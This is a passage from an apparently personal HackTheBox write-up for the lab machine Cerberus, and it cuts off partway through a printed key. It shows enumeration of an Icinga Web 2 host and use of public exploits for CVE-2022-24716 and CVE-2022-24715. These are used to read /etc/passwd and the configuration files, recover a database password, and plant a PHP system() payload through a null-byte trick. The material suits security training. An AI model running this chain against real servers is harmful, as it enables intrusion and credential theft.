HTB | Cerberus
Machine - https://app.hackthebox.com/machines/Cerberus
IP - 10.10.11.205
NMAP
└─$ nmap -sC -sV -p 8080 10.10.11.205 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-13 12:31 IST
Nmap scan report for 10.10.11.205
Host is up (0.30s latency).
PORT STATE SERVICE VERSION
8080/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Did not follow redirect to <http://icinga.cerberus.local:8080/icingaweb2>
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 22.58 secondsPort 8080
Nothing was found on dirsearch
└─$ dirsearch -u <http://icinga.cerberus.local:8080/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Cerberus/reports/http_icinga.cerberus.local_8080/__25-08-13_12-49-16.txt
Target: <http://icinga.cerberus.local:8080/>
[12:49:16] Starting:
Task Completed But we found alot of 302 when fuzzing /icingaweb2
└─$ dirsearch -u <http://icinga.cerberus.local:8080/icingaweb2/> -x 403,404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See <https://setuptools.pypa.io/en/latest/pkg_resources.html>
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/anurag/htb/Cerberus/reports/http_icinga.cerberus.local_8080/_icingaweb2__25-08-13_12-54-20.txt
Target: <http://icinga.cerberus.local:8080/>
[12:54:20] Starting: icingaweb2/
[12:54:37] 301 - 345B - /icingaweb2/js -> <http://icinga.cerberus.local:8080/icingaweb2/js/>
[12:55:04] 302 - 0B - /icingaweb2/0 -> /icingaweb2/authentication/login
[12:55:14] 302 - 0B - /icingaweb2/About -> /icingaweb2/authentication/login?redirect=About
[12:55:14] 302 - 0B - /icingaweb2/about -> /icingaweb2/authentication/login?redirect=about
[12:55:16] 302 - 0B - /icingaweb2/account/login.aspx -> /icingaweb2/authentication/login?redirect=account%2Flogin.aspx
[12:55:16] 302 - 0B - /icingaweb2/account/login -> /icingaweb2/authentication/login?redirect=account%2Flogin
[12:55:16] 302 - 0B - /icingaweb2/account/ -> /icingaweb2/authentication/login?redirect=account%2F
[12:55:16] 302 - 0B - /icingaweb2/account -> /icingaweb2/authentication/login?redirect=account
[12:55:16] 302 - 0B - /icingaweb2/account/login.php -> /icingaweb2/authentication/login?redirect=account%2Flogin.php
[12:55:16] 302 - 0B - /icingaweb2/account/login.jsp -> /icingaweb2/authentication/login?redirect=account%2Flogin.jsp
[12:55:16] 302 - 0B - /icingaweb2/account/login.html -> /icingaweb2/authentication/login?redirect=account%2Flogin.html
[12:55:16] 302 - 0B - /icingaweb2/account/login.js -> /icingaweb2/authentication/login?redirect=account%2Flogin.js
[12:55:16] 302 - 0B - /icingaweb2/account/login.rb -> /icingaweb2/authentication/login?redirect=account%2Flogin.rb
[12:55:16] 302 - 0B - /icingaweb2/account/login.py -> /icingaweb2/authentication/login?redirect=account%2Flogin.py
[12:55:16] 302 - 0B - /icingaweb2/account/login.shtml -> /icingaweb2/authentication/login?redirect=account%2Flogin.shtml
[12:55:16] 302 - 0B - /icingaweb2/account/logon -> /icingaweb2/authentication/login?redirect=account%2Flogon
[12:55:16] 302 - 0B - /icingaweb2/account/login.htm -> /icingaweb2/authentication/login?redirect=account%2Flogin.htm
[12:55:16] 302 - 0B - /icingaweb2/account/signin -> /icingaweb2/authentication/login?redirect=account%2Fsignin
[12:56:12] 302 - 0B - /icingaweb2/config -> /icingaweb2/authentication/login?redirect=config
[12:56:13] 302 - 0B - /icingaweb2/config/app.yml -> /icingaweb2/authentication/login?redirect=config%2Fapp.yml
[12:56:13] 302 - 0B - /icingaweb2/config/banned_words.txt -> /icingaweb2/authentication/login?redirect=config%2Fbanned_words.txt
[12:56:13] 302 - 0B - /icingaweb2/config/autoload/ -> /icingaweb2/authentication/login?redirect=config%2Fautoload%2F
[12:56:13] 302 - 0B - /icingaweb2/config/apc.php -> /icingaweb2/authentication/login?redirect=config%2Fapc.php
[12:56:13] 302 - 0B - /icingaweb2/config/app.php -> /icingaweb2/authentication/login?redirect=config%2Fapp.php
[12:56:13] 302 - 0B - /icingaweb2/Config/ -> /icingaweb2/authentication/login?redirect=Config%2F
[12:56:13] 302 - 0B - /icingaweb2/config/AppData.config -> /icingaweb2/authentication/login?redirect=config%2FAppData.config
[12:56:13] 302 - 0B - /icingaweb2/config/ -> /icingaweb2/authentication/login?redirect=config%2F
[12:56:13] 302 - 0B - /icingaweb2/config/config.inc -> /icingaweb2/authentication/login?redirect=config%2Fconfig.inc
[12:56:13] 302 - 0B - /icingaweb2/config/aws.yml -> /icingaweb2/authentication/login?redirect=config%2Faws.yml
[12:56:13] 302 - 0B - /icingaweb2/config/config.ini -> /icingaweb2/authentication/login?redirect=config%2Fconfig.ini
[12:56:13] 302 - 0B - /icingaweb2/config/database.yml -> /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml
[12:56:13] 302 - 0B - /icingaweb2/config/database.yml.pgsql -> /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml.pgsql
[12:56:13] 302 - 0B - /icingaweb2/config/database.yml.sqlite3 -> /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml.sqlite3
[12:56:13] 302 - 0B - /icingaweb2/config/database.yml~ -> /icingaweb2/authentication/login?redirect=config%2Fdatabase.yml~
[12:56:13] 302 - 0B - /icingaweb2/config/databases.yml -> /icingaweb2/authentication/login?redirect=config%2Fdatabases.yml
[12:56:13] 302 - 0B - /icingaweb2/config/db.inc -> /icingaweb2/authentication/login?redirect=config%2Fdb.inc
[12:56:13] 302 - 0B - /icingaweb2/config/development/ -> /icingaweb2/authentication/login?redirect=config%2Fdevelopment%2F
[12:56:13] 302 - 0B - /icingaweb2/config/master.key -> /icingaweb2/authentication/login?redirect=config%2Fmaster.key
[12:56:13] 302 - 0B - /icingaweb2/config/settings/production.yml -> /icingaweb2/authentication/login?redirect=config%2Fsettings%2Fproduction.yml
[12:56:13] 302 - 0B - /icingaweb2/config/producao.ini -> /icingaweb2/authentication/login?redirect=config%2Fproducao.ini
[12:56:13] 302 - 0B - /icingaweb2/config/site.php -> /icingaweb2/authentication/login?redirect=config%2Fsite.php
[12:56:13] 302 - 0B - /icingaweb2/config/settings.local.yml -> /icingaweb2/authentication/login?redirect=config%2Fsettings.local.yml
[12:56:13] 302 - 0B - /icingaweb2/config/settings.inc -> /icingaweb2/authentication/login?redirect=config%2Fsettings.inc
[12:56:13] 302 - 0B - /icingaweb2/config/monkcheckout.ini -> /icingaweb2/authentication/login?redirect=config%2Fmonkcheckout.ini
[12:56:13] 302 - 0B - /icingaweb2/config/settings.ini.cfm -> /icingaweb2/authentication/login?redirect=config%2Fsettings.ini.cfm
[12:56:13] 302 - 0B - /icingaweb2/config/initializers/secret_token.rb -> /icingaweb2/authentication/login?redirect=config%2Finitializers%2Fsecret_token.rb
[12:56:13] 302 - 0B - /icingaweb2/config/settings.ini -> /icingaweb2/authentication/login?redirect=config%2Fsettings.ini
[12:56:13] 302 - 0B - /icingaweb2/config/xml/ -> /icingaweb2/authentication/login?redirect=config%2Fxml%2F
[12:56:13] 302 - 0B - /icingaweb2/config/monkid.ini -> /icingaweb2/authentication/login?redirect=config%2Fmonkid.ini
[12:56:13] 302 - 0B - /icingaweb2/config/monkdonate.ini -> /icingaweb2/authentication/login?redirect=config%2Fmonkdonate.ini
[12:56:14] 302 - 0B - /icingaweb2/config/routes.yml -> /icingaweb2/authentication/login?redirect=config%2Froutes.yml
[12:56:17] 301 - 346B - /icingaweb2/css -> <http://icinga.cerberus.local:8080/icingaweb2/css/>
[12:56:18] 302 - 0B - /icingaweb2/dashboard -> /icingaweb2/authentication/login?redirect=dashboard
[12:56:18] 302 - 0B - /icingaweb2/dashboard/ -> /icingaweb2/authentication/login?redirect=dashboard%2F
[12:56:18] 302 - 0B - /icingaweb2/dashboard/faq.html -> /icingaweb2/authentication/login?redirect=dashboard%2Ffaq.html
[12:56:18] 302 - 0B - /icingaweb2/dashboard/howto.html -> /icingaweb2/authentication/login?redirect=dashboard%2Fhowto.html
[12:56:18] 302 - 0B - /icingaweb2/dashboard/phpinfo.php -> /icingaweb2/authentication/login?redirect=dashboard%2Fphpinfo.php
[12:56:20] 302 - 0B - /icingaweb2/default -> /icingaweb2/authentication/login?redirect=default
[12:56:36] 302 - 0B - /icingaweb2/group -> /icingaweb2/authentication/login?redirect=group
[12:56:38] 302 - 0B - /icingaweb2/health -> /icingaweb2/authentication/login?redirect=health
[12:56:41] 301 - 346B - /icingaweb2/img -> <http://icinga.cerberus.local:8080/icingaweb2/img/>
[12:56:42] 302 - 0B - /icingaweb2/index -> /icingaweb2/authentication/login?redirect=index
[12:56:42] 200 - 0B - /icingaweb2/index.php
[12:56:50] 302 - 0B - /icingaweb2/list -> /icingaweb2/authentication/login?redirect=list
[12:57:32] 302 - 0B - /icingaweb2/Search -> /icingaweb2/authentication/login?redirect=Search
[12:57:32] 302 - 0B - /icingaweb2/search -> /icingaweb2/authentication/login?redirect=search
[12:57:53] 302 - 0B - /icingaweb2/user/ -> /icingaweb2/authentication/login?redirect=user%2F
[12:57:53] 302 - 0B - /icingaweb2/user -> /icingaweb2/authentication/login?redirect=user
[12:57:53] 302 - 0B - /icingaweb2/user/0 -> /icingaweb2/authentication/login?redirect=user%2F0
[12:57:53] 302 - 0B - /icingaweb2/user/1 -> /icingaweb2/authentication/login?redirect=user%2F1
[12:57:53] 302 - 0B - /icingaweb2/user/2 -> /icingaweb2/authentication/login?redirect=user%2F2
[12:57:53] 302 - 0B - /icingaweb2/user/3 -> /icingaweb2/authentication/login?redirect=user%2F3
[12:57:53] 302 - 0B - /icingaweb2/user/admin -> /icingaweb2/authentication/login?redirect=user%2Fadmin
[12:57:54] 302 - 0B - /icingaweb2/user/login.php -> /icingaweb2/authentication/login?redirect=user%2Flogin.php
[12:57:54] 302 - 0B - /icingaweb2/user/login.aspx -> /icingaweb2/authentication/login?redirect=user%2Flogin.aspx
[12:57:54] 302 - 0B - /icingaweb2/user/admin.php -> /icingaweb2/authentication/login?redirect=user%2Fadmin.php
[12:57:54] 302 - 0B - /icingaweb2/user/login.jsp -> /icingaweb2/authentication/login?redirect=user%2Flogin.jsp
[12:57:54] 302 - 0B - /icingaweb2/user/login.js -> /icingaweb2/authentication/login?redirect=user%2Flogin.js
[12:57:54] 302 - 0B - /icingaweb2/user/login/ -> /icingaweb2/authentication/login?redirect=user%2Flogin%2F
[12:57:54] 302 - 0B - /icingaweb2/user/login.html -> /icingaweb2/authentication/login?redirect=user%2Flogin.html
[12:57:54] 302 - 0B - /icingaweb2/user/signup -> /icingaweb2/authentication/login?redirect=user%2Fsignup
Task Completed Foothold/shell
Shell as www-data on icinga
Arbitrary File Disclosure (CVE-2022-24716)
Also, when looking for known vulnerabilities, we found RCE
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ searchsploit icinga
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote Denial of Service | cgi/dos/38882.txt
Icinga Web 2.10 - Arbitrary File Disclosure | php/webapps/51329.py
Icinga Web 2.10 - Authenticated Remote Code Execution | php/webapps/51586.py
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No ResultsBut that RCE required a valid username and password
└─$ python3 51586.py
usage: 51586.py [-h] -u URL -U USER -P PASSWORD -i IP -p PORT
51586.py: error: the following arguments are required: -u/--url, -U/--user, -P/--password, -i/--ip, -p/--portBut Arbitrary File Disclosure worked
└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologinwe cannot upload files, so i started looking around
└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/hosts'
127.0.0.1 iceinga.cerberus.local iceinga
127.0.1.1 localhost
172.16.22.1 DC.cerberus.local DC cerberus.local
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allroutersHere we can see 172.16.22.1 pointing to DC and this IP is probably some internal IP (maybe containerization/virtualization, or we need to do some pivoting?)
Getting cred of matthew via Doc
Since we cannot do anything, let’s look for configuration files (reference - Icinga Web Doc )
└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/icingaweb2/config.ini'
[global]
show_stacktraces = "1"
show_application_state_messages = "1"
config_backend = "db"
config_resource = "icingaweb2"
module_path = "/usr/share/icingaweb2/modules/"
[logging]
log = "syslog"
level = "ERROR"
application = "icingaweb2"
facility = "user"
[themes]
[authentication]The user preferences are stored in the database resource db
From resources.ini we got the credentail for matthew
└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/etc/icingaweb2/resources.ini'
[icingaweb2]
type = "db"
db = "mysql"
host = "localhost"
dbname = "icingaweb2"
username = "matthew"
password = "IcingaWebPassword2023"
use_ssl = "0"from this we can login
CVE-2022-24715
Public POCs did not work for me
Since we did not find any Public POC to work, we can go for the manual method
But first, we need to create a PEM file
└─$ ssh-keygen -m pem -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/home/anurag/.ssh/id_rsa): tempkey
Enter passphrase for "tempkey" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in tempkey
Your public key has been saved in tempkey.pub
The key fingerprint is:
SHA256:4J9lWRD1jRqhq66XUu4KJIrz4A/gVb2oxVIgRxq2knQ anurag@anurag
The key's randomart image is:
+---[RSA 3072]----+
| =.E ooo |
|o.B . . o o o |
|oo o.. . o o .|
|. +.... + o |
|. .o.+..S = . |
|+..o+ ..= |
|=o .. o+. |
|.+. ...+ |
| .o. o*o |
+----[SHA256]-----+
┌──(anurag㉿anurag)-[~/htb/Cerberus]
└─$ cat tempkey
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----
Now we will go to Application - > Resources and create a new resource
Let’s put SSH key there and save
and we can validate the file upload via LFI
└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/dev/shm/anurag.txt'
-----BEGIN RSA PRIVATE KEY-----
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
-----END RSA PRIVATE KEY-----Now let’s try to get shell
But for that we need to find a way to run php or bash but since it only takes SSH keys that will not be easy
But from the sonar article, we can put a null byte and trick it into running PHP
└─$ python3 51329.py <http://icinga.cerberus.local:8080/icingaweb2/> '/dev/shm/anurag4.txt'
<?php system("id");?>
-----BEGIN RSA PRIVATE KEY-----
MIIG4wIBAAKCAYEAueKqGxn1boYQ7hLQ21rQKrVwRbQYYZieX7I4hbN4PWyGYl7g
C8uSLG8NoSLMtMEdIuq0+0rMydOokCv3XuFMwcZcxgjZn7Hco+YuOG8PVntKvSPE
LkqTezj7ty2fyubqhYYbS+guXS77kqITn9JE/tpou695eZsEwbUPPNtHbf94+aZY
CcISbWLwhUXm9cevRhzZAAFgSUB8hBv+cGNAhtiHbghAZRf7FEawbDEfJjgzut39
jAlzzeGPMvx7f85vGL7X2x2lcguj3ZyL9UUlXYOQHnz19NiZyxR9tI1oAJBljl68
I2J72kL1W1TGZ9kh77qOpPWVQkobDgxEK4TwQSBgNSrdVlwNGEodBW2329jFGxMf
NxW0gNoyjfq+typZKPtwCgNluGBwQBPmfoCQRfeJup1H4h0xmtPNjC7VJs81VVAF
RU72uwzqQ/E0psHAocKKnFLgIFZzJ2qsdyAGyhCxdI2uj9gwUE5WkL2xaOQ0Rp/D
LGk8cU209g2Wtj/VAgMBAAECggGALQtvl8YsWrZbu2ltWb6Rs8vIc2evQdU7SarV
NhcVw+K81PEzP0B7QU+/AIV/kCy83AV+ymdnpV/oWNmCpigYEtv4BthFrkRqWIBS
woOtNpKFe7yDUYlqYEGgg9TnREK9YZJsInKW66dTOMcUVNYeOJjiKNsep3iIiE1R
LjjgABiYrvyfmGvCTeYcLVuRWo1jXKzoa+8pb07Ubaof+AmhLRwjA2e1/Rl400LH
BUzJBNi5NmcNhkYTHTiz3BHhdojmKs13KhAc2w5aZnQ38u2TAiEjPJDtJcL5F+K1
VaJylR2vN0cjzEpXXbf54qcHnks/m+PR/k/ze0s1Cado+oxxW4AJsm4iYXC6wxfS
u5w/qSZBSAaZYTyhtOFlyHHLyROZYneRpDqX9dlebuk1iqKlR+jSAtM9npi1Qivb
TYj3UM6WXz82YWbixd1QoexR6y/BoFpgeewS2QKAfKPqc5mV/tAilu/rI7oEcNIf
uYVLBxA6BIIdMjJDNxXed53wdhERAoHBAOLVUgQIkJVCAauhqVbaReUGTgEREWMI
AgasMDNB4az5QxYpUBppLMf/h5w1QlGJpe+eQeMOxq9buzBwQlx38Qag17L9V6EJ
Q0ejHPn+gtPGdmCLQMM5nSt/TL/q9Gc7xr03zjR/WYtwDfoCcmaFCqOdsCCn3VJ4
v9ezIsla0aEZDDVK34YdTc+B7uonfdbAr/dlRR/5VWD2NxNBIFK3KgGZfSj8q85P
15CxSYnvvBoggD1up0Giv95d5QdxQO/LxQKBwQDRyXYdcKqhnfyAJGk2HneFF62x
sPhZcUeeXkfl4IPY2/TEWBP4dxFXGMdLCfWrQQnpVarfsxtEadNN/glYa2g9pbB0
F4vVIjuUBmcs1q/UG3C/ppD43uix8MiTExpqs1ARQt/zRuUIsVXegVlF6psVogn/
joJmkHI/bJ143vguiLqE0aGNSIXRz32HcpT7N9SfQgMIIFpsb0tk5zGIkonI4O0u
ptbsokz1p01ftDwK/1g5BETcKNaGJPxtMQ/HlNECgcAxRd1W+vVNNtVeDvPV5fwg
z8nJ+YcpV+f4wxaFS95V0J9+BONdmVMc7qjqibcqNxhQgLQXOnJ2TRrQXtJLe9Jj
ejTgsJ+EX5q5yPjWZS7OCeJU/mrG/ZDijfiCB+unMRjuqVylkrRE0cZ3dGidVHEH
